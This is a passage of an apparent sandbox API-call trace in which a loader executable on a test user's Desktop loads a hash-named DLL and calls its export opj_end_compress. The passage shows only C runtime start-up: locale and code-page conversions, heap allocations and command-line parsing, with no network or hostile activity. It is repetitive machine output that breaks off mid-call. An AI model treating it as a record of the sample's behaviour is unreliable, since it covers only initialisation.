hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0201.921] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="LCMapStringEx") returned 0x7ffc5bfb5350 [0201.921] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0201.921] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0201.921] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f790, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", lpUsedDefaultChar=0x0) returned 256 [0201.921] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0201.921] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0201.921] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0201.921] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0201.921] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f890, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0201.922] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x100) returned 0x491640 [0201.922] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7ff626f72300, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0201.922] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x174) returned 0x489640 [0201.922] RtlInitializeSListHead (in: ListHead=0x7ff626f72160 | out: ListHead=0x7ff626f72160) [0201.922] GetLastError () returned 0x0 [0201.922] SetLastError (dwErrCode=0x0) [0201.922] GetEnvironmentStringsW () returned 0x494d20* [0201.922] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x9cc) returned 0x495700 [0201.922] FreeEnvironmentStringsW (penv=0x494d20) returned 1 [0201.923] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x118) returned 0x48a130 [0201.923] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x3e) returned 0x490720 [0201.923] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x5c) returned 0x480780 [0201.923] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x62) returned 0x4847a0 [0201.923] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x78) returned 0x48c290 [0201.923] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x62) returned 0x4855e0 [0201.923] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x28) returned 0x48ae90 [0201.923] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x48) returned 0x490fe0 [0201.923] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x1a) returned 0x48b2e0 [0201.923] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x3a) returned 0x4913f0 [0201.923] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x62) returned 0x484510 [0201.923] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x2a) returned 0x48e080 [0201.923] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x2e) returned 0x48e600 [0201.923] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x1c) returned 0x48b310 [0201.923] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0xd2) returned 0x485870 [0201.923] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x7c) returned 0x484000 [0201.923] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x3a) returned 0x491030 [0201.923] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x90) returned 0x483c20 [0201.923] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x24) returned 0x48b370 [0201.923] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x30) returned 0x48e140 [0201.923] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x36) returned 0x48e580 [0201.923] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x3c) returned 0x490bd0 [0201.923] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x52) returned 0x489220 [0201.923] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x3c) returned 0x4910d0 [0201.923] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0xd6) returned 0x4851b0 [0201.923] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x2e) returned 0x48e0c0 [0201.923] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x1e) returned 0x48afb0 [0201.923] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x2c) returned 0x48e740 [0201.923] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x54) returned 0x488bc0 [0201.923] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x52) returned 0x488c20 [0201.924] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x24) returned 0x48aec0 [0201.924] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x42) returned 0x490f90 [0201.924] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x2c) returned 0x48e380 [0201.924] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x44) returned 0x490cc0 [0201.924] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x24) returned 0x48b160 [0201.924] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x495700 | out: hHeap=0x480000) returned 1 [0201.924] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x1000) returned 0x494d20 [0201.924] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff626f52580) returned 0x0 [0201.924] GetStartupInfoW (in: lpStartupInfo=0x14fea0 | out: lpStartupInfo=0x14fea0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0201.924] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_end_compress" [0201.925] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_end_compress", pNumArgs=0x14fe70 | out: pNumArgs=0x14fe70) returned 0x489310*="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" [0201.925] LoadLibraryW (lpLibFileName="C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll") returned 0x7ffc45e90000 [0201.929] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0201.929] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0201.929] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0201.930] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0201.930] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0201.930] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0201.931] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0201.931] GetProcessHeap () returned 0x480000 [0201.931] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0201.931] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0201.931] GetLastError () returned 0x0 [0201.931] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsGetValue") returned 0x7ffc5bfe3780 [0201.932] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0201.932] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x3c8) returned 0x4961b0 [0201.932] SetLastError (dwErrCode=0x0) [0201.932] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x1200) returned 0x496580 [0202.191] GetStartupInfoW (in: lpStartupInfo=0x14f6f0 | out: lpStartupInfo=0x14f6f0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0202.191] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0202.191] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0202.191] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0202.192] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_end_compress" [0202.192] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_end_compress" [0202.192] GetACP () returned 0x4e4 [0202.192] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x228) returned 0x48a840 [0202.192] IsValidCodePage (CodePage=0x4e4) returned 1 [0202.192] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f6b0 | out: lpCPInfo=0x14f6b0) returned 1 [0202.192] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14ef50 | out: lpCPInfo=0x14ef50) returned 1 [0202.192] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0202.192] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14eca0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp") returned 256 [0202.193] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp", cchSrc=256, lpCharType=0x14f270 | out: lpCharType=0x14f270) returned 1 [0202.193] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0202.193] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14ec40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0202.193] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0202.193] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="LCMapStringEx") returned 0x7ffc5bfb5350 [0202.193] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0202.194] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ea30, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0202.194] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ 